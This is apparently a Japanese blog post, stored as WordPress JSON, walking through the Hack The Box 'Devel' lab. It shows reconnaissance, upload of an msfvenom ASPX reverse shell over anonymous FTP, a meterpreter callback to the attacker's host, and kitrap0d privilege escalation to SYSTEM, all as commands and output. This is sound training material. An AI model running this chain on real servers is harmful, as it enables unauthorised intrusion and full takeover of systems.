{"id":3722,"date":"2020-08-11T00:29:09","date_gmt":"2020-08-10T15:29:09","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3722"},"modified":"2020-08-30T23:34:28","modified_gmt":"2020-08-30T14:34:28","slug":"hack-the-box-devel-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3722","title":{"rendered":"Hack The Box &#8211; Devel &#8211; Walkthrough"},"content":{"rendered":"<h3>FTP\u3068HTTP\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 devel.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-08 07:44 UTC\r\nNmap scan report for devel.htb (10.10.10.5)\r\nHost is up (0.044s latency).\r\nNot shown: 98 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n21\/tcp open  ftp     Microsoft ftpd\r\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\r\n| 03-18-17  02:06AM       &lt;DIR&gt;          aspnet_client\r\n| 03-17-17  05:37PM                  689 iisstart.htm\r\n|_03-17-17  05:37PM               184946 welcome.png\r\n| ftp-syst:\r\n|_  SYST: Windows_NT\r\n80\/tcp open  http    Microsoft IIS httpd 7.5\r\n| http-methods:\r\n|_  Potentially risky methods: TRACE\r\n|_http-server-header: Microsoft-IIS\/7.5\r\n|_http-title: IIS7\r\n<\/pre>\n<h3>FTP\u30a2\u30af\u30bb\u30b9\u3057\u3066\u307f\u308b\u3068\u3001\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30eb\u30fc\u30c8\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b<\/h3>\n<p><a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_165142.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_165142-300x202.png\" alt=\"\" width=\"300\" height=\"202\" class=\"alignnone size-medium wp-image-3723\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_165142-300x202.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_165142-768x517.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_165142.png 995w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<h3>\u30ea\u30d0\u30fc\u30b9\u30b7\u30a7\u30eb\u3092\u53d6\u5f97\u3059\u308baspx\u30d5\u30a1\u30a4\u30eb\u3092\u8a2d\u7f6e\u3059\u308b<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.10.14.13 LPORT=1234 -f aspx &gt; reverse.aspx\r\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\r\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\r\nNo encoder specified, outputting raw payload\r\nPayload size: 341 bytes\r\nFinal size of aspx file: 2788 bytes\r\n\r\n# ftp devel.htb\r\nConnected to devel.htb.\r\n220 Microsoft FTP Service\r\nName (devel.htb:root): anonymous\r\n331 Anonymous access allowed, send identity (e-mail name) as password.\r\nPassword:\r\n230 User logged in.\r\nRemote system type is Windows_NT.\r\nftp&gt; passive\r\nPassive mode on.\r\nftp&gt; put reverse.aspx\r\nlocal: reverse.aspx remote: reverse.aspx\r\n227 Entering Passive Mode (10,10,10,5,192,10).\r\n125 Data connection already open; Transfer starting.\r\n226 Transfer complete.\r\n2824 bytes sent in 0.00 secs (5.7918 MB\/s)\r\n<\/pre>\n<h3>\u30ea\u30d0\u30fc\u30b9\u30b7\u30a7\u30eb\u3092\u53d7\u3051\u4ed8\u3051\u308b\u304c\u3001\u30e6\u30fc\u30b6\u30d5\u30a9\u30eb\u30c0\u306b\u306f\u30a2\u30af\u30bb\u30b9\u3067\u304d\u306a\u3044<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# msfconsole\r\nmsf5 &gt; use exploit\/multi\/handler\r\n&#x5B;*] Using configured payload generic\/shell_reverse_tcp\r\nmsf5 exploit(multi\/handler) &gt; set payload windows\/meterpreter\/reverse_tcp\r\npayload =&gt; windows\/meterpreter\/reverse_tcp\r\nmsf5 exploit(multi\/handler) &gt; set LHOST 10.10.14.13\r\nLHOST =&gt; 10.10.14.13\r\nmsf5 exploit(multi\/handler) &gt; set LPORT 1234\r\nLPORT =&gt; 1234\r\nmsf5 exploit(multi\/handler) &gt; exploit\r\n&#x5B;*] Started reverse TCP handler on 0.0.0.0:1234\r\n&#x5B;*] Sending stage (176195 bytes) to 172.17.0.1\r\n&#x5B;*] Meterpreter session 1 opened (172.17.0.2:1234 -&gt; 172.17.0.1:37972) at 2020-08-10 14:42:31 +0000\r\n\r\nmeterpreter &gt; getuid\r\nServer username: IIS APPPOOL\\Web\r\nmeterpreter &gt; shell\r\nProcess 3828 created.\r\nChannel 1 created.\r\nMicrosoft Windows &#x5B;Version 6.1.7600]\r\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\r\n\r\nc:\\windows\\system32\\inetsrv&gt;whoami\r\nwhoami\r\niis apppool\\web\r\nc:\\windows\\system32\\inetsrv&gt;cd c:\\Users\r\ncd c:\\Users\r\nc:\\Users&gt;cd babis\r\ncd babis\r\nAccess is denied.\r\n<\/pre>\n<h3>local_exploit_suggester\u3092\u5229\u7528\u3057\u3066\u8106\u5f31\u6027\u3092\u63a2\u3059<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nmeterpreter &gt; bg\r\n&#x5B;*] Backgrounding session 1...\r\nmsf5 exploit(multi\/handler) &gt; use post\/multi\/recon\/local_exploit_suggester\r\nmsf5 post(multi\/recon\/local_exploit_suggester) &gt; set session 1\r\nsession =&gt; 1\r\nmsf5 post(multi\/recon\/local_exploit_suggester) &gt; exploit\r\n\r\n&#x5B;*] 10.10.10.5 - Collecting local exploits for x86\/windows...\r\n&#x5B;*] 10.10.10.5 - 34 exploit checks are being tried...\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/bypassuac_eventvwr: The target appears to be vulnerable.\r\nnil versions are discouraged and will be deprecated in Rubygems 4\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms10_015_kitrap0d: The service is running, but could not be validated.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms10_092_schelevator: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms13_053_schlamperei: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms13_081_track_popup_menu: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms14_058_track_popup_menu: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms15_004_tswbproxy: The service is running, but could not be validated.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms15_051_client_copy_image: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms16_016_webdav: The service is running, but could not be validated.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms16_075_reflection: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ntusermndragover: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ppr_flatten_rec: The target appears to be vulnerable.\r\n&#x5B;*] Post module execution completed\r\n<\/pre>\n<h3>ms10_015_kitrap0d\u3092\u4f7f\u3063\u3066\u653b\u7565\u3059\u308b<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nmsf5 exploit(multi\/handler) &gt; use exploit\/windows\/local\/ms10_015_kitrap0d\r\n&#x5B;*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\r\nmsf5 exploit(windows\/local\/ms10_015_kitrap0d) &gt; set LHOST 10.10.14.13\r\nLHOST =&gt; 10.10.14.13\r\nmsf5 exploit(windows\/local\/ms10_015_kitrap0d) &gt; set SESSION 1\r\nSESSION =&gt; 1\r\nmsf5 exploit(windows\/local\/ms10_015_kitrap0d) &gt; exploit\r\n\r\n&#x5B;-] Handler failed to bind to 10.10.14.13:4444:-  -\r\n&#x5B;*] Started reverse TCP handler on 0.0.0.0:4444\r\n&#x5B;*] Launching notepad to host the exploit...\r\n&#x5B;+] Process 4020 launched.\r\n&#x5B;*] Reflectively injecting the exploit DLL into 4020...\r\n&#x5B;*] Injecting exploit into 4020 ...\r\n&#x5B;*] Exploit injected. Injecting payload into 4020...\r\n&#x5B;*] Payload injected. Executing exploit...\r\n&#x5B;+] Exploit finished, wait for (hopefully privileged) payload execution to complete.\r\n&#x5B;*] Sending stage (176195 bytes) to 172.17.0.1\r\n&#x5B;*] Meterpreter session 3 opened (172.17.0.2:4444 -&gt; 172.17.0.1:42604) at 2020-08-10 15:19:11 +0000\r\n\r\nmeterpreter &gt; getuid\r\nServer username: NT AUTHORITY\\SYSTEM\r\nmeterpreter &gt; shell\r\nProcess 596 created.\r\nChannel 1 created.\r\nMicrosoft Windows &#x5B;Version 6.1.7600]\r\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\r\n\r\nc:\\windows\\system32\\inetsrv&gt;cd c:\\Users\r\ncd c:\\Users\r\nc:\\Users&gt;type babis\\Desktop\\user.txt.txt\r\ntype babis\\Desktop\\user.txt.txt\r\n9ecdd6a3aedf24b41562fea70f4cb3e8\r\nc:\\Users&gt;type administrator\\Desktop\\root.txt\r\ntype administrator\\Desktop\\root.txt\r\nThe system cannot find the file specified.\r\n\r\nc:\\Users&gt;type administrator\\Desktop\\root.txt.txt\r\ntype administrator\\Desktop\\root.txt.txt\r\ne621a0b5041708797c4fc4728bc72b4b\r\n<\/pre>\n<h3>\u53c2\u8003<\/h3>\n<p><a href=\"https:\/\/paichan-it.hatenablog.com\/entry\/2020\/08\/07\/165736\">\u3010Hack The Box\u3011Devel Walkthrough<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>FTP\u3068HTTP\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b # nmap -A -n -F -T5 devel.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-08 07:44 UTC [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3722"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3722"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3722\/revisions"}],"predecessor-version":[{"id":3788,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3722\/revisions\/3788"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3722"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3722"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3722"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}